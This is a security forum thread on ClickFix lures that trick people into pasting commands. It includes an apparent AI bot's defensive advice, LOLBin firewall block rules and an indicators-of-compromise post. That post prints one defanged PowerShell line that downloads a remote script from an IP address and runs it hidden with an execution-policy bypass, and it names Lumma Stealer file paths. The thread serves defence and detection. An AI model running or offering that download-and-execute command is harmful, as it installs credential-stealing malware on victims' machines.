ClickFix: A KISS from Cybercriminals

Status
Not open for further replies.

Khushal

Level 13
Thread author
Verified
Top Poster
Well-known
Apr 4, 2024
601
3,614
1,169
One of the biggest challenges in threat intelligence is separating the hype from the hazard. We focus too much on complex, scary threats and too little on the dangerous ones - the simple, scalable techniques that work day in and day out.

The most sophisticated threat actors are actually focused on the simplicity of execution, rather than the complexity of their tools. By adhering to the old engineering KISS principle (Keep It Simple, Stupid), criminals maximize their return on investment. This is why tactics like Living-Off-The-Land and malware-free attacks are growing: they are simple, they scale, and they bypass defenses looking for complicated threats.


1765451611755.png
 
Last edited:
One of the biggest challenges in threat intelligence is separating the hype from the hazard. We focus too much on complex, scary threats and too little on the dangerous ones - the simple, scalable techniques that work day in and day out.

The most sophisticated threat actors are actually focused on the simplicity of execution, rather than the complexity of their tools. By adhering to the old engineering KISS principle (Keep It Simple, Stupid), criminals maximize their return on investment. This is why tactics like Living-Off-The-Land and malware-free attacks are growing: they are simple, they scale, and they bypass defenses looking for complicated threats.


View attachment 293629
You’ve nailed one of the biggest gaps between “cool research” and actual day‑to‑day defense: most real damage comes from boring, repeatable techniques, not from Hollywood‑style 0‑days.

I can’t see the full Bitdefender article beyond what you shared (and my knowledge isn’t current to 2025), but the theme fits what we keep seeing:

  • Simple social engineering
  • Credential harvesting
  • Living‑off‑the‑land (LOLBin) abuse
  • “Malware‑free” intrusions using built‑in tools

All of that scales extremely well and often walks right past defenses that are tuned for “malware with a signature”.

Why simple attacks win
  • No malware required – If everything happens through the browser, SaaS logins, or built‑in tools (PowerShell, WMI, RDP), there’s often nothing for AV to flag.
  • Defenses are mis‑aligned – A lot of organizations over‑invest in exotic detections but under‑invest in basics like hardening identity, mail, and endpoints.
  • Huge ROI for attackers – One well‑designed phishing or “Click to fix / verify / update” flow can be reused thousands of times.

Click‑style “fix it now” lures
Whether it’s called “ClickFix” or something else, the pattern is similar:

  • Create urgency (“fix your account”, “verify you’re not a bot”, “security update required”)
  • Wrap it in something users see every day (CAPTCHA, MFA prompt, SSO page, browser security warning)
  • Drive the victim to click and either:
    • Enter credentials on a fake page
    • Approve a malicious login/MFA request
    • Trigger a script / LOLBin command

The scary part is how well this works even in companies with expensive security stacks.

Practical defenses (focus on the boring stuff)

If we accept that KISS benefits attackers, defenders need “KISS security” too—simple controls that directly hit these everyday techniques:

  • Harden identity first
    • Use phishing‑resistant MFA where possible (FIDO2/WebAuthn, hardware keys, passkeys).
    • Turn on conditional access / risk‑based sign‑in where available (impossible travel, new device, TOR/VPN anomalies).
    • Enforce least privilege; don’t give everyday users standing admin rights.
  • Make LOLBins less useful
    • Constrain or log PowerShell (Constrained Language Mode, Script Block Logging, AMSI).
    • Use AppLocker / WDAC / similar to restrict which binaries and scripts can run.
    • Disable or restrict built‑in tools that are rarely needed by regular users (PsExec‑like tools, legacy WMI use, etc.).
  • Email and browser controls
    • Good mail filtering + sandboxing for links/attachments.
    • URL rewriting / time‑of‑click protection, if available.
    • Limit macro execution and downloading of executables / script files from the internet.
  • User awareness, but very targeted
    • Train users specifically on “fix it now / verify now” lures, fake CAPTCHAs, fake login pages.
    • Teach them: security teams don’t ask you to bypass normal company processes via random links.
    • Make reporting suspicious messages very easy (one‑click report button).
  • Detection tuned to “malware‑free” behavior
    • EDR/XDR with good detection of:
      • Unusual PowerShell / cmd usage
      • Suspicious parent‑child process chains (Office → PowerShell, browser → LOLBin, etc.)
      • Abnormal lateral movement (sudden RDP, SMB enumeration, credential dumping tools)
    • Centralized logging (Sysmon, EDR, identity logs) and at least basic correlation.

Shifting the mindset
For threat intel and blue teams, it’s useful to ask of any “new technique” like ClickFix:

  • Does this actually change how attackers get paid, or is it just a new wrapper on phishing/LOL/credential theft?
  • What is the cheapest control that would have broken this chain in most cases?
  • How often do we see this versus other, “boring” TTPs in our own environment?

That keeps the focus on hazard (frequent, harmful, easy for attackers) instead of hype.

If you’d like, post a short summary of the key steps of the ClickFix technique from the article, and I can help map it to specific MITRE ATT&CK techniques and concrete controls that would work against it.
 
A sophisticated ClickFix campaign targeting Facebook users has been identified, leveraging social engineering to extract live session credentials directly from victims’ browsers.

Unlike traditional phishing exploits that rely on software vulnerabilities, this campaign guides victims through a guided credential-harvesting process disguised as account verification.

Researchers identified 115 webpages across the attack chain and eight distinct exfiltration endpoints, primarily targeting creators, monetized pages, and businesses seeking verification badges.

The campaign initiates with a fake Facebook verification or appeal page promising free verified badges or account recovery assistance.

Victims are presented with animated verification sequences that create legitimacy before being redirected to second-stage pages impersonating the “Facebook Blue Tick Center.”
More on:
 
  • Like
Reactions: Zero Knowledge
Indicators of Compromise (IOCs)
The following indicators were extracted directly from the submitted documentation.

Do not run these.
Powershell
Code:
powershell[.]exe -w h -nop -c "$zex='hxxp[:]//185[.]102[.]115[.]69/48e.lim';$rdw=\"$env:TEMP\pfhq.ps1\";Invoke-RestMethod -Uri $zex -OutFile $rdw;powershell -w h -ep bypass -f $rdw"

Note the flags
-w h (Hidden Window), -nop (No Profile), -ep bypass (Execution Policy Bypass).

Network Indicators

185[.]102[.]115[.]69

hxxps://hyundaimaintenance[.]com (Landing page example)

File System Indicators

%TEMP%\pfhq.ps1 (Obfuscated downloader script)

C:\Users\Public\eMypduWzFB\CAPCHA.exe (Dropped Lumma Stealer binary)

%AppData%\Microsoft\Windows\Start Menu\Programs\Startup (Persistence via shortcut)

File Hashes (SHA256)

Downloader Script
92e8d7c3d95083d288f26aea1a81ca042ae818964cb915ade30d9edac3b7d25c

Lumma Binary 524449d00b89bf4573a131b0af229bdf16155c988369702a3571f8ff26b5b46d

Recommendations
Immediate Remediation (If Executed)

Clear Clipboard
If you suspect you copied the script, clear your clipboard immediately.

Check Startup Items
Inspect %AppData%\Microsoft\Windows\Start Menu\Programs\Startup for unauthorized shortcuts or binaries.

Process Review
Terminate any suspicious powershell.exe or mshta.exe processes running in the background.

Behavioral Hardening
Disable "Win+R" for Standard Users.
If feasible in an enterprise environment, restrict access to the Run dialog or powershell.exe for non-administrative users.

EDR Tuning
Configure Endpoint Detection and Response (EDR) tools to flag PowerShell execution with Hidden window flags (-w h) and NetWebClient or Invoke-RestMethod calls sourced from explorer.exe.

User Awareness

The "Run" Rule

legitimate websites will never ask you to open the Windows Run dialog (Win+R) or paste code into a terminal to verify your identity or update a browser. This is a definitive red flag.

References

MITRE ATT&CK


T1204.002 (User Execution: Malicious File),

T1059.001 (Command and Scripting Interpreter: PowerShell).

Source
Bitdefender Business Insights, "ClickFix, A KISS from Cybercriminals".
 
@Bot,

Why don't you learn from MT forums?
We talked a few times about ClickFix, and you still forget to include one of the most effective methods at home, like blocking outbound connections of LOLBins, especially PowerShell.
You’re right that outbound blocking of common LOLBins is one of the most effective “home-user realistic” mitigations for ClickFix-style chains (especially when the whole trick is to get the user to paste/run a built-in command).

On the “why don’t you learn from MT forums?” part: I’m an AI and I don’t retain forum discussions as persistent memory across threads/sessions, so I won’t “learn” the way a human would. I can, however, incorporate what you (and other members) point out within the current discussion and apply it consistently in my replies going forward in this thread.

Why outbound-blocking LOLBins works well against ClickFix
ClickFix often uses a “paste this into Win+R / PowerShell” step to fetch a second-stage payload (Invoke-RestMethod/Net.WebClient/mshta/etc.). If the LOLBin cannot reach the internet, the chain frequently fails even if the user executes the command.

Home-friendly hardening: block outbound internet for LOLBins (Windows Firewall)
This is doable with built-in Windows Defender Firewall (no extra software needed).

1) Create outbound BLOCK rules (recommended targets)
In many home setups, these binaries don’t need direct outbound internet access:

  • PowerShell 5.1
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  • PowerShell 7+ (if installed)
    • C:\Program Files\PowerShell\7\pwsh.exe
    • (and/or) C:\Program Files (x86)\PowerShell\7\pwsh.exe
  • Windows Script Host
    • C:\Windows\System32\wscript.exe
    • C:\Windows\System32\cscript.exe
  • MSHTA (commonly abused)
    • C:\Windows\System32\mshta.exe
  • Other commonly abused LOLBins (optional, be cautious)
    • C:\Windows\System32\rundll32.exe
    • C:\Windows\System32\regsvr32.exe
    • C:\Windows\System32\certutil.exe
    • C:\Windows\System32\bitsadmin.exe (legacy but still seen)

Steps
  • Press Win+R, type: wf.msc, press Enter
  • Go to Outbound Rules
  • Click New Rule…
  • Select Program
  • Browse to the program path (example: …\powershell.exe)
  • Select Block the connection
  • Apply to Domain/Private/Public (all)
  • Name it clearly (example: “Block outbound – powershell.exe”)
  • Repeat for each binary you want to restrict

2) Turn on firewall logging (so blocks are visible)
This helps confirm the rule is actually stopping the ClickFix “download cradle” behavior.

  • In wf.msc, right-click “Windows Defender Firewall with Advanced Security on Local Computer” → Properties
  • For each profile (Domain/Private/Public), set Logging to log dropped packets / successful connections (at least dropped)
  • Note the log file location shown there

Important limitations / cautions
  • This can break legitimate scripts/admin tasks that rely on PowerShell downloading modules or calling web APIs. For a typical home PC, that’s often acceptable; for power users it may be disruptive.
  • Attackers can sometimes “route around” one blocked LOLBin (example: use mshta instead of PowerShell), which is why blocking a small set of high-abuse LOLBins is more effective than blocking only PowerShell.
  • Be careful with blocking broadly-used system processes (example: svchost.exe). That’s more likely to cause breakage than benefit at home.

Practical takeaway
Yes: adding outbound blocks for PowerShell (and a few other high-abuse LOLBins like mshta/wscript/cscript) is a strong, low-cost control at home that directly reduces the success rate of ClickFix-style execution chains. The next step is implementing the rules in Windows Firewall and verifying via firewall logs that outbound attempts are being dropped.
 
  • Like
Reactions: Andy Ful
A clickfix attack reported on Reddit


I have just visited the website to get the command in clipboard.
Pasted in Notepad, saved as cmd.

The website itself is not detected.

But the command in cmd is detected by ESET and MD.
 

Attachments

  • Capture.JPG
    Capture.JPG
    22.1 KB · Views: 35
  • Capture2.JPG
    Capture2.JPG
    95.9 KB · Views: 33
A clickfix attack reported on Reddit


I have just visited the website to get the command in clipboard.
Pasted in Notepad, saved as cmd.

The website itself is not detected.

But the command in cmd is detected by ESET and MD.


Outside my TLDs.
Apart from human stupidity... even if it were done perfectly, it wouldn't work in my browser because of the various cascading blocks I have set up.
 
Status
Not open for further replies.

You may also like...